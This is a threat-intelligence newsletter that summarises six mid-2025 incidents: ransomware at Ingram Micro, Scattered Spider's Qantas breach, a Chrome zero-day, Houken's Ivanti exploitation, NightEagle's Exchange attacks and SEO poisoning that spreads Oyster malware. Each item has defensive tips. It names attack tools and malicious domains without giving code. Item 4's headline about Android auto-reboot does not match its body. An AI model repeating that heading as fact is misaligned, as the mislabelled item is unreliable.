Cybersecurity Threats and Trends - 07/08/2025

Today's cyber roundup features critical vulnerabilities, SEO pensioning, and sophisticated APT tactics...

Author

J.W. Croley
July 09, 2025

While you were busy debating whether your smart toaster really needs a firmware update, threat actors were busy turning enterprise networks into their personal ATMs. Welcome to this week's cybersecurity nightmare fuel – where ransomware gangs have better customer service than most legitimate businesses.

1. Ingram Micro Crippled by SafePay Ransomware Attack

Primary Threat: Global IT distributor Ingram Micro suffers major ransomware attack causing widespread service outages and supply chain disruptions. 

Risk: HIGH

IT giant Ingram Micro confirmed it has been hit by a SafePay ransomware attack that began early Thursday morning, causing ongoing outages across its global operations. The attack has forced the company to shut down internal systems, including its AI-powered Xvantage distribution platform and Impulse license provisioning platform, affecting thousands of resellers and managed service providers worldwide. Sources indicate the threat actors gained initial access through Ingram Micro's GlobalProtect VPN platform, exploiting what appears to be compromised credentials or configuration weaknesses. The SafePay ransomware operation, which has accumulated over 220 victims since November 2024, has become one of the more active groups in 2025, typically targeting corporate networks through VPN gateways using password spray attacks and compromised credentials. This breach is particularly concerning given Ingram Micro's position as one of the world's largest technology distributors, creating a supply chain vulnerability that ripples through countless organizations dependent on their services for hardware, software, and cloud solutions.

Detection and Remediation Tips:

  • If you're an Ingram Micro customer, implement emergency procurement contingency plans and identify alternative suppliers immediately

  • Review all VPN access controls and implement additional authentication layers for critical infrastructure

  • Audit third-party vendor dependencies and develop backup supply chain strategies

  • Monitor for any unusual network traffic patterns that could indicate lateral movement from compromised vendor connections

  • Implement network segmentation to isolate vendor-facing systems from critical internal infrastructure

  • Consider implementing zero-trust architecture for all external vendor access points

2. Qantas Faces Extortion After Scattered Spider Data Breach

Primary Threat: Primary Threat: Australian airline Qantas confirms extortion demands following cyberattack that exposed data for 6 million customers.

Risk: HIGH

Qantas disclosed that threat actors are now extorting the airline following a cyberattack that potentially exposed personal information for 6 million customers, including names, email addresses, phone numbers, dates of birth, and frequent flyer numbers. The breach, detected on July 1st, occurred through a third-party contact center system and is attributed to the Scattered Spider group, which has been systematically targeting the aviation sector using sophisticated social engineering tactics. The group has demonstrated particular skill at convincing help desk personnel to reset passwords and multi-factor authentication protections by impersonating legitimate employees. This attack follows a pattern of Scattered Spider operations that began with retail sector breaches at Marks & Spencer and Co-op in April, then shifted focus to insurance companies before targeting aviation and transportation industries with successful attacks on WestJet and Hawaiian Airlines.

Detection and Remediation Tips:

  • Implement enhanced verification procedures for all password reset requests, especially those involving privileged accounts

  • Train help desk staff to recognize social engineering tactics and establish out-of-band verification protocols

  • Review and strengthen third-party vendor security requirements and monitoring capabilities

  • Consider implementing behavioral analytics to detect unusual access patterns in customer-facing systems

  • Develop incident response procedures specifically for social engineering attacks targeting support staff

3. Google Patches Fourth Chrome Zero-Day of 2025

Primary Threat: Primary Threat: Google releases emergency security updates for actively exploited Chrome zero-day vulnerability CVE-2025-6554.

Risk: HIGH

Google released emergency security updates to address CVE-2025-6554, a type confusion vulnerability in Chrome's V8 JavaScript engine that is being actively exploited in the wild. This marks the fourth Chrome zero-day vulnerability patched by Google since the start of 2025, highlighting the continued targeting of web browsers by sophisticated threat actors. The vulnerability was discovered by Clément Lecigne of Google's Threat Analysis Group, suggesting it may have been weaponized in highly targeted attacks involving nation-state actors or surveillance operations. Type confusion vulnerabilities are particularly dangerous as they can be exploited to trigger unexpected software behavior, potentially leading to arbitrary code execution and complete system compromise. The flaw affects Chrome versions prior to 138.0.7204.96 and can be exploited through crafted HTML pages, making it a prime target for drive-by download attacks and watering hole campaigns.

Detection and Remediation Tips:

  • Update Chrome browsers immediately to versions 138.0.7204.96/.97 for Windows, 138.0.7204.92/.93 for macOS, and 138.0.7204.96 for Linux

  • Enable automatic browser updates across all enterprise endpoints to ensure rapid deployment of security patches

  • Consider implementing browser isolation technologies for high-risk users or sensitive operations

  • Monitor for suspicious JavaScript execution and implement content security policies to limit script execution

  • Extend updates to all Chromium-based browsers including Microsoft Edge, Brave, Opera, and Vivaldi

Did you know...?

The SafePay ransomware group behind the Ingram Micro attack has an interesting operational quirk – they often attempt to patch the same vulnerabilities they used to gain access, effectively locking out other ransomware groups from exploiting the same entry points. This "vulnerability hoarding" behavior demonstrates how competitive the ransomware-as-a-service ecosystem has become, with groups actively working to maintain exclusive access to compromised networks rather than sharing attack vectors with competitors.

4. Google Adds Android Auto-Reboot Feature to Block Forensic Data Extractions

Primary Threat: Chinese state-sponsored group Houken exploits multiple Ivanti CSA zero-day vulnerabilities targeting French critical infrastructure.

Risk: HIGH

French cybersecurity agency ANSSI revealed that Chinese hackers from the Houken group (linked to UNC5174) exploited three zero-day vulnerabilities in Ivanti Cloud Services Appliance devices to target government, telecommunications, media, finance, and transport sectors. The campaign, detected in September 2024, leveraged CVE-2024-8963, CVE-2024-9380, and CVE-2024-8190 to deploy sophisticated rootkits and maintain persistent access to compromised networks. The attackers used publicly available web shells like Behinder and neo-reGeorg, followed by deployment of GOREVERSE malware and a Linux kernel module called "sysinitd.ko" that hijacks inbound TCP traffic to enable remote command execution with root privileges. ANSSI assessed that Houken likely operates as an initial access broker, selling network access to other state-linked actors while pursuing their own financial interests through cryptocurrency mining operations.

Detection and Remediation Tips:

  • Immediately patch all Ivanti CSA devices and implement additional monitoring for these systems

  • Deploy network detection and response solutions capable of identifying kernel-level rootkits and traffic hijacking

  • Implement strict network segmentation around critical infrastructure components

  • Monitor for unusual TCP traffic patterns and unauthorized kernel module installations

  • Develop threat hunting procedures specifically targeting Chinese APT tactics, techniques, and procedures

5. NightEagle APT Targets Microsoft Exchange with Zero-Day Chain

Primary Threat: Primary Threat: Previously unknown APT group NightEagle exploits Microsoft Exchange zero-day vulnerabilities targeting Chinese military and technology sectors.

Risk: HIGH

Cybersecurity researchers from QiAnXin disclosed a new threat actor called NightEagle that has been exploiting Microsoft Exchange servers using a zero-day exploit chain to target government, defense, and technology sectors in China. The group, active since 2023, has demonstrated extremely fast infrastructure rotation and deploys a modified version of the Chisel tunneling utility configured to automatically establish connections every four hours. The attackers exploit an undisclosed zero-day vulnerability to obtain Exchange server machineKeys, enabling them to deserialize Exchange servers and implant trojans while remotely accessing mailbox data. QiAnXin attributes the activity to a North American threat actor based on attack timing patterns occurring between 9 p.m. and 6 a.m. Beijing time, suggesting operations conducted during North American business hours.

Detection and Remediation Tips:

  • Implement enhanced monitoring for Microsoft Exchange servers, particularly focusing on unusual authentication patterns

  • Deploy endpoint detection and response solutions capable of identifying modified legitimate tools like Chisel

  • Monitor for scheduled tasks that establish network connections at regular intervals

  • Implement network segmentation to limit Exchange server access to essential services only

  • Consider implementing Exchange Online or hybrid configurations to reduce on-premises attack surface

6. SEO Poisoning Campaign Targets SMBs with Fake AI Tools

Primary Threat: Cybercriminals use search engine optimization poisoning to distribute Oyster malware disguised as popular AI tools.

Risk: MEDIUM

Security researchers disclosed a malicious campaign leveraging SEO poisoning techniques to target over 8,500 small and medium-sized business users with malware disguised as legitimate AI tools. The campaign promotes fake websites hosting trojanized versions of popular software like PuTTY and WinSCP, tricking software professionals into downloading and installing the Oyster malware loader (also known as Broomstick or CleanUpLoader). Upon execution, the malware establishes persistence through scheduled tasks that run every three minutes, executing malicious DLL files via rundll32.exe using DLL registration as part of the persistence mechanism. The campaign specifically targets AI-related search terms, exploiting the current popularity of artificial intelligence tools to lure victims to malicious download sites with domains like updaterputty.com, zephyrhype.com, and putty.run.

Detection and Remediation Tips:

  • Implement application whitelisting and software restriction policies to prevent unauthorized executable installation

  • Train employees to download software only from official vendor websites and verify digital signatures

  • Deploy web filtering solutions to block known malicious domains and suspicious SEO-poisoned sites

  • Monitor for scheduled tasks that execute DLL files at regular intervals as potential indicators of compromise

  • Implement endpoint detection and response solutions capable of identifying Oyster/Broomstick malware families

IN SUMMARY:

The cybersecurity landscape continues to evolve at breakneck speed, with threat actors demonstrating increasing sophistication in their targeting and attack methodologies. Organizations must adopt a proactive, multi-layered defense strategy that addresses not only technical vulnerabilities but also the human elements that remain the weakest link in most security architectures.

🚨 Key Takeaways:

✔️ Supply chain attacks against technology distributors can create widespread disruption across multiple organizations and industries.
✔️ Social engineering attacks targeting help desk personnel remain highly effective and require enhanced verification procedures
✔️ Browser zero-day vulnerabilities continue to be actively exploited, necessitating rapid patch deployment and browser isolation strategies
✔️ State-sponsored groups are increasingly operating as initial access brokers, selling network access to other threat actors
✔️ SEO poisoning campaigns are evolving to exploit current technology trends like artificial intelligence to distribute malware

🔎 Immediate Actions:

✔️ Update all Chrome browsers to the latest versions immediately
✔️ Review and strengthen VPN access controls
✔️ Implement enhanced verification procedures for password reset operations
✔️ Audit third-party vendor dependencies and develop contingency plans for disruptions
✔️ Deploy network detection and response solutions for APT tactics
✔️ Train employees to recognize SEO poisoning attacks and to verify software downloads

💡 Stay vigilant, patch promptly, and remember that in cybersecurity, paranoia isn't a disorder – it's a job requirement. 💡

J.W.

(P.S. Check out our partners! It goes a long way to support this newsletter!)